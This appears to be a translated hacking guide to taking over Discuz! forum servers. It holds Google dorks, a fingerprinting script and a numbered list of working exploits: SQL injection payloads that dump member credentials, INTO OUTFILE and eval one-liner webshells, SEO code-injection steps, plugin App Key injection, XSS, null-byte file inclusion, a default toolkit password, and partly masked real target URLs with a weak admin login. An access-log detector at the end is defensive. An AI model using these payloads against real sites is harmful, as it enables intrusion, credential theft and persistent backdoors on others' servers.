Discuz! vulnerabilities: taking the server
Google dorks and common fingerprint paths:
# Format: path ------ keyword ------ CMS name
# Format: path ------ regex ------ keyword that must appear in the regex match ------ CMS name
/------Powered by.*?<------Discuz!------Discuz (Comsenz)
/------Powered by.*?</a></strong>------Discuz!------Discuz (Comsenz)
/robots.txt------discuz------Discuz (Comsenz)
/bbcode.js------discuz------Discuz (Comsenz)
/newsfader.js------discuz------Discuz (Comsenz)
/templates.cdb------discuz------Discuz (Comsenz)
/u2upopup.js------discuz------Discuz (Comsenz)
/admin/discuzfiles.md5------discuz------Discuz (Comsenz)
/api/manyou/cloud_channel.htm------discuz------Discuz (Comsenz)
/images/admincp/admincp.js------discuz------Discuz (Comsenz)
/include/javascript/ajax.js------discuz------Discuz (Comsenz)
/mspace/default/style.ini------discuz------Discuz (Comsenz)
/plugins/manyou/discuz_plugin_manyou.xml------discuz------Discuz (Comsenz)
/source/plugin/myapp/discuz_plugin_myapp.xml------discuz------Discuz (Comsenz)
/static/js/admincp.js------discuz------Discuz (Comsenz)
/template/default/common/common.css------discuz------Discuz (Comsenz)
/uc_server/view/default/admin_frame_main.htm------discuz------Discuz (Comsenz)
/mspace/default1/style.ini------discuz------Discuz (Comsenz)
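The fingerprint table above, turned into a small checker. This is an added example and not code from the original notes: it fetches each listed path once and applies the row's rule, where a keyword row needs the keyword somewhere in the body and a regex row needs the keyword inside the regex hit. The regex rows are read as `Powered by.*?<` with the space restored (the table shows the two words run together), and the fetcher is injectable so the rules can be exercised offline against the constructed `SAMPLE_SITE` responses; `http_fetcher` is the only part that touches the network and `base_url` is whatever target you point it at.

```python
import re
from typing import Callable, Dict, List, NamedTuple, Optional


class Rule(NamedTuple):
    path: str       # request path relative to the site root
    pattern: str    # keyword, or a regular expression when is_regex is True
    keyword: str    # must occur in the body (keyword rule) or inside the regex hit (regex rule)
    is_regex: bool
    cms: str


CMS = "Discuz (Comsenz)"

# Rows transcribed from the fingerprint table; the two "/" rows are the regex rows.
# "\s*" between "powered" and "by" is my reading of the table's "poweredby".
RULES: List[Rule] = [
    Rule("/", r"powered\s*by.*?<", "Discuz!", True, CMS),
    Rule("/", r"powered\s*by.*?</a></strong>", "Discuz!", True, CMS),
] + [
    Rule(path, "discuz", "discuz", False, CMS)
    for path in (
        "/robots.txt",
        "/bbcode.js",
        "/newsfader.js",
        "/templates.cdb",
        "/u2upopup.js",
        "/admin/discuzfiles.md5",
        "/api/manyou/cloud_channel.htm",
        "/images/admincp/admincp.js",
        "/include/javascript/ajax.js",
        "/mspace/default/style.ini",
        "/plugins/manyou/discuz_plugin_manyou.xml",
        "/source/plugin/myapp/discuz_plugin_myapp.xml",
        "/static/js/admincp.js",
        "/template/default/common/common.css",
        "/uc_server/view/default/admin_frame_main.htm",
        "/mspace/default1/style.ini",
    )
]

# A fetcher maps a path to the response body, or None when the resource is not served.
Fetcher = Callable[[str], Optional[str]]


def rule_matches(rule: Rule, body: str) -> bool:
    """Apply one table row to a response body."""
    if rule.is_regex:
        hit = re.search(rule.pattern, body, re.IGNORECASE | re.DOTALL)
        return hit is not None and rule.keyword.lower() in hit.group(0).lower()
    return rule.keyword.lower() in body.lower()


def fingerprint(fetch: Fetcher) -> Dict[str, List[str]]:
    """Return {cms name: [paths whose rule matched]}; every path is fetched at most once."""
    cache: Dict[str, Optional[str]] = {}
    hits: Dict[str, List[str]] = {}
    for rule in RULES:
        if rule.path not in cache:
            cache[rule.path] = fetch(rule.path)
        body = cache[rule.path]
        if body is not None and rule_matches(rule, body):
            matched = hits.setdefault(rule.cms, [])
            if rule.path not in matched:
                matched.append(rule.path)
    return hits


def http_fetcher(base_url: str, timeout: float = 5.0) -> Fetcher:
    """Fetcher for a live target; urlopen raises on non-2xx, which we map to None."""
    from urllib.error import URLError
    from urllib.request import Request, urlopen

    def fetch(path: str) -> Optional[str]:
        req = Request(base_url.rstrip("/") + path, headers={"User-Agent": "Mozilla/5.0"})
        try:
            with urlopen(req, timeout=timeout) as resp:
                return resp.read(200_000).decode("utf-8", "replace")
        except (URLError, OSError, ValueError):
            return None

    return fetch


# Constructed sample site (not captured from any real server): three paths carry the
# Discuz! marker, one exists without it, everything else is missing.
SAMPLE_SITE: Dict[str, str] = {
    "/": '<div id="footer">Powered by <strong><a href="http://www.discuz.net">Discuz!</a></strong></div>',
    "/robots.txt": "#\n# robots.txt for Discuz! X3\n#\nUser-agent: *\nDisallow: /api/\n",
    "/static/js/admincp.js": "/* [Discuz!] (C)2001-2099 Comsenz Inc. */\nvar ADMINCP = 1;",
    "/bbcode.js": "var bbcodes = [];",
}


def sample_fetcher(path: str) -> Optional[str]:
    return SAMPLE_SITE.get(path)


if __name__ == "__main__":
    print(fingerprint(sample_fetcher))
```

Note that the first regex row stops at the first `<`, so on a stock footer (`Powered by <strong><a ...>Discuz!</a></strong>`) only the second row fires; the first only matches footers where the product name precedes any tag. The same rule shape covers the config backup paths listed further down: add them as keyword rows with `<?php` as the keyword to confirm the file is served as source rather than as a 404 page.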
Basic Discuz! vulnerabilities:
Discuz! X1.5 / Discuz! 7.2 admin-panel getshell 0day (works across versions)
Discuz! plugin SQL injection vulnerability
Discuz! 7.1 & 7.2 remote code execution vulnerability
Discuz! 7.2 manyou plugin path disclosure & getwebshell 0day
Discuz! 7.2 to X1 Mood Wall plugin SQL injection and persistent XSS vulnerability
Discuz! key-issuing plugin injection 0day
Discuz! 7.x universal 0day (UCenter Home 2.0)
1. Dz ychat plugin injection vulnerability
Vulnerable URL: http://**.**.**.**/plugin.php?id=ychat&mod=rooms&cid=6x
2. Dz SQL injection
Vulnerable URL: http://www.xxcom/faq.php?action= ...
3. Source-code archive left downloadable
Vulnerable URL: http://***.com/bbs.tar.gz
4. Discuz! emergency toolkit not disabled; the default password 188281MWWXJK logs you in
Vulnerable URL: http://www.**.com/source/plugin/tools/tools.php
5. Weak Discuz! password
Vulnerable URL: http://bbs.wan.58.com/uc_server/admin.php
http://bbs.wan.58.com/uc_server/admin.php?sid=B962WHAGM3MYDVYKLEECVOQSS7PPPJKGUZTZ270FNQQI5F6HEOSAH6OSA7NZMTXLPUIMUJAZ3%2BZADQ weak password: admin
6. Discuz! X2.5
Description: the broadcast reply feature has an XSS vulnerability; HTML and script are not filtered.
7. Discuz! X2 SQL injection vulnerability
Vulnerable file: http://www.**.com/source/module/forum/forum_attachment.php
8. Common path-disclosure files
/uc_server/control/admin/db.php
/source/plugin/myrepeats/table/table_myrepeats.php
/install/include/install_lang.php
9. DZ X1.5 / DZ 7.2 vulnerability
Admin panel: Plugins -> Add plugin -> Import method: upload the XML file attached to the original post, and tick "allow importing plugins for a different Discuz! version" (this step fails easily!).
Shell address: data/plugindata/shell.lang.php (Discuz! X1.5)
Shell address: forumdata/plugins/shell.lang.php (Discuz! 7.2)
10. Discuz! 7.x universal 0day (UCenter Home 2.0)
Dork: powered by UCenter inurl:shop.php?ac=view
Dork 2: inurl:shop.php?ac=view&shopid=
Vulnerable file: shop.php
PoC (error-based injection; MySQL's duplicate-entry error echoes the database name wrapped in ~'...'~):
shop.php?ac=view&shopid=4 and (select 1 from (select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
11. DZ key-issuing plugin injection 0day
2Fly serial-number issuing system
Vulnerable file: 2fly_gift.php
Exp:
http://www.xxx.com/2fly_gift.php?pages=content&gameid=16 and 1=2 union select 1,2,3,4,concat(username,0x3a,password),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37 from cdb_members
Keyword search:
inurl:2fly_gift.php
12. DZ 7.2 Mood Wall plugin
Persistent XSS in the plugin: HTML placed directly in the mood text is rendered unescaped
"><script>alert(/xss/)</script>
The SQL injection in the same plugin is of limited use; almost no vulnerable sites are left.
Vulnerable URL: http://www.**.com/plugin.php?id=moodwall&action=edit_mood&moodid=2
13. DZ manyou plugin path disclosure
File: ./manyou/source/notice.php
/userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=' union select NULL,NULL,NULL,NULL,0x3c3f70687020406576616c28245f504f53545b274f275d293b3f3e,NULL,NULL,NULL,NULL into outfile 'C:/inetpub/wwwroot/shell.php'%23
(the hex literal is <?php @eval($_POST['O']);?>; the outfile write only succeeds when the MySQL account holds the FILE privilege and the web root is writable by the database server)
/manyou/admincp.php?my_suffix=%0a%0dtoby57 discloses the physical path
14. Common Discuz! backup file paths
/config/config_global.php.bak
/config/config_ucenter.php.bak
/config.inc.php.bak
15. DZ 6.1 admin-panel getshell
http://127.0.0.1/discuz/admincp.php?action=runwizard&frames=yes
Open admincp.php?action=runwizard&frames=yes, click Next, and put the webshell into the forum name field:
<?php eval($_POST[cmd]);?>
Webshell address afterwards: http://127.0.0.1/discuz/forumdata/logs/runwizardlog.php
Alternatively, Admin panel: Templates -> Default template set -> Details, edit
templates/default/actions.lang.php
and insert:
Jhackj\\');eval($_POST[cmd])?>;//
16. Discuz! X2.5 latest getshell 0day, detailed exploitation
A remote code execution vulnerability in the implementation lets a remote attacker run arbitrary code.
The target must have the SEO function enabled for exploitation to succeed.
Vulnerable file: upload/source/class/helper/helper_seo.php
With SEO enabled in the admin settings, the front end can submit specially crafted content that gets executed as code.
Exploitation steps:
1) Register any account.
2) Log in and post a blog entry (note: a blog entry).
3) Add a picture, choose "network picture", and enter as the address:
{${fputs(fopen(base64_decode(ZGVtby5waHA),w),base64_decode(PD9waHAgQGV2YWwoJF9QT1NUW2NdKTsgPz5vaw))}}
(the two base64 strings decode to demo.php and <?php @eval($_POST[c]); ?>ok)
4) Open the blog entry; demo.php is created under the forum root, a one-line shell with password c.
The exploit needs SEO enabled, and specifically SEO enabled for user blogs; without that, forget about getting the site.
Addendum: yes, SEO has to be enabled, but not, as he says, necessarily blog SEO. The "various places such as source/include/space/space_blog.php" in my article above was just a casual example; in fact anywhere you can publish content works. The simplest is to find a forum section and post. It mainly depends on where the administrator enabled SEO; if you don't know where, just post everywhere.
The method does not have to use a blog, nor a network picture. For the actual exploitation I just posted a thread with the content
${${eval(chr(112).chr(104).chr(112).chr(105).chr(110).chr(102).chr(111).chr(40).chr(41).chr(59))}}
then added any hyperlink to it and published. phpinfo(), enjoy :)
17. XSS vulnerability
[email]2"onmouseover="alert(2)[/email]
Register a user, post a new blog entry containing this, then click Edit and the alert fires.
18. DZ X3.1 unauthorized reply
Some forum sections require VIP membership to reply. Click Share under the post, tick "reply at the same time", and the reply goes through, revealing the hidden content.
19. A vulnerable plugin
inurl:plugin.php?id=dc_mail
Exploit via file inclusion:
**/plugin.php?action=./../../../../data/attachment/forum/201508/02/201508/02/153404ryzl4yytgyz4yjrl.jpg%00&id=dc_mall
(the %00 terminates the include path; this only works on PHP before 5.3.4, which started rejecting null bytes in file paths)
20. Forced reply
Click Reply; if replying is refused, open the developer tools (F12) and change the <a href> to
<a href="http://xxx.xxx.xxx/forum.php?mod=post&?action=reply&?fid=170&?tid=9310" onclick="showWindow('reply', this.href)">reply</a>
then click Reply again.
21. Haodai webmaster alliance plugin injection
Click "import existing interface information" and, in the App Key field, enter the one-liner
1234');eval($_POST[1]);//
then open /data/dzapp-haodai-config.php
and you have a shell:
request /data/dzapp-haodai-config.php with POST 1=phpinfo()
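Most of the requests in these notes leave a recognisable trace in the web server's access log: the shop.php error-based injection, the manyou userapp.php `into outfile` and admincp.php `my_suffix` requests, the config `.bak` paths, the tools.php toolkit, the runwizardlog.php shell, the plugin.php `action=` traversal with `%00`, and the dzapp-haodai config file. As an added example, not part of the original notes, here is a detector that parses combined-format log lines, URL-decodes the request target (so the `%00`, `%0a%0d`, `%27` and `%23` encodings used above are seen in the clear, with a second pass for double encoding) and flags these signatures. The log lines are constructed for the example and the signature names are my own. Payloads that travel in a POST body, such as the `{${...}}` SEO injection or the App Key one-liner, never appear in an access log, so for those only the later access to the dropped file is visible.

```python
import re
from typing import Iterable, List, NamedTuple
from urllib.parse import unquote, unquote_plus


class Alert(NamedTuple):
    ip: str
    signature: str
    target: str     # raw request target exactly as logged
    status: int


# Apache/nginx combined log format: ip ident user [time] "METHOD target PROTO" status size ...
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" (?P<status>\d{3}) (?P<size>\S+)'
)

# Signatures derived from the requests listed in these notes; they run on the decoded target.
SIGNATURES = [
    # shop.php / 2fly_gift.php / userapp.php: union-based and floor(rand(0)*2) error-based injection
    ("sqli_union_or_error_based",
     re.compile(r"union\s+select|floor\s*\(\s*rand\s*\(|information_schema", re.I)),
    # userapp.php: writing a file through MySQL
    ("sqli_into_outfile", re.compile(r"into\s+outfile", re.I)),
    # plugin.php?action=: directory traversal, null-byte truncation
    ("path_traversal_or_null_byte", re.compile(r"\.\./|\x00")),
    # config backups left on the web root
    ("discuz_backup_file_probe",
     re.compile(r"/config/config_(?:global|ucenter)\.php\.bak|/config\.inc\.php\.bak", re.I)),
    # emergency toolkit with its default password
    ("discuz_emergency_toolkit", re.compile(r"/source/plugin/tools/tools\.php", re.I)),
    # shell dropped through the run-wizard log
    ("discuz_runwizard_log_webshell", re.compile(r"/forumdata/logs/runwizardlog\.php", re.I)),
    # manyou admincp.php: CR/LF in my_suffix used for path disclosure
    ("manyou_my_suffix_crlf", re.compile(r"my_suffix=[^&]*[\r\n]", re.I)),
    # config file the haodai plugin writes the App Key into
    ("dzapp_haodai_config_access", re.compile(r"/data/dzapp-haodai-config\.php", re.I)),
]


def decode_target(target: str) -> str:
    """URL-decode path and query ("+" is a space only in the query); a second pass
    catches double-encoded payloads such as %2527."""
    decoded = target
    for _ in range(2):
        path, sep, query = decoded.partition("?")
        decoded = unquote(path) + sep + unquote_plus(query)
        if "%" not in decoded:
            break
    return decoded


def scan_log(lines: Iterable[str]) -> List[Alert]:
    """Return one Alert per (line, signature) hit; lines that do not parse are skipped."""
    alerts: List[Alert] = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        decoded = decode_target(m["target"])
        for name, rx in SIGNATURES:
            if rx.search(decoded):
                alerts.append(Alert(m["ip"], name, m["target"], int(m["status"])))
    return alerts


# Constructed log lines modelled on the requests above (not real traffic).
SAMPLE_LOG = [
    '1.2.3.4 - - [10/Oct/2015:13:55:36 +0800] "GET /shop.php?ac=view&shopid=4%20and%20(select%201%20from%20(select%20count(*),concat((select%20database()),floor(rand(0)*2))x%20from%20information_schema.tables%20group%20by%20x)a) HTTP/1.1" 500 1234 "-" "Mozilla/5.0"',
    '5.6.7.8 - - [10/Oct/2015:13:56:01 +0800] "GET /plugin.php?action=../../../../data/attachment/forum/201508/02/x.jpg%00&id=dc_mall HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
    '9.9.9.9 - - [10/Oct/2015:13:57:12 +0800] "GET /userapp.php?script=notice&view=all&option=deluserapp&action=invite&hash=%27%20union%20select%20NULL,NULL,NULL,NULL,0x3c3f,NULL%20into%20outfile%20%27C:/inetpub/wwwroot/shell.php%27%23 HTTP/1.1" 200 88 "-" "Mozilla/5.0"',
    '10.0.0.1 - - [10/Oct/2015:13:58:00 +0800] "GET /config/config_global.php.bak HTTP/1.1" 404 210 "-" "Mozilla/5.0"',
    '10.0.0.2 - - [10/Oct/2015:13:58:30 +0800] "GET /forum.php?mod=viewthread&tid=123 HTTP/1.1" 200 9876 "-" "Mozilla/5.0"',
    '10.0.0.3 - - [10/Oct/2015:13:59:00 +0800] "GET /manyou/admincp.php?my_suffix=%0a%0dtoby57 HTTP/1.1" 200 340 "-" "Mozilla/5.0"',
    '10.0.0.4 - - [10/Oct/2015:13:59:30 +0800] "GET /source/plugin/tools/tools.php HTTP/1.1" 200 2048 "-" "Mozilla/5.0"',
    '10.0.0.5 - - [10/Oct/2015:14:00:00 +0800] "POST /forumdata/logs/runwizardlog.php HTTP/1.1" 200 45 "-" "Mozilla/5.0"',
]


if __name__ == "__main__":
    for a in scan_log(SAMPLE_LOG):
        print(f"{a.ip:<10} {a.status} {a.signature:<32} {a.target[:60]}")
```

The status code is kept on each alert on purpose: a 500 on a `floor(rand(` request is what an error-based injection looks like when it works, and a 404 on a `.bak` probe tells you the file was not there, whereas a 200 on the same path means the configuration, including the database credentials, has already been read.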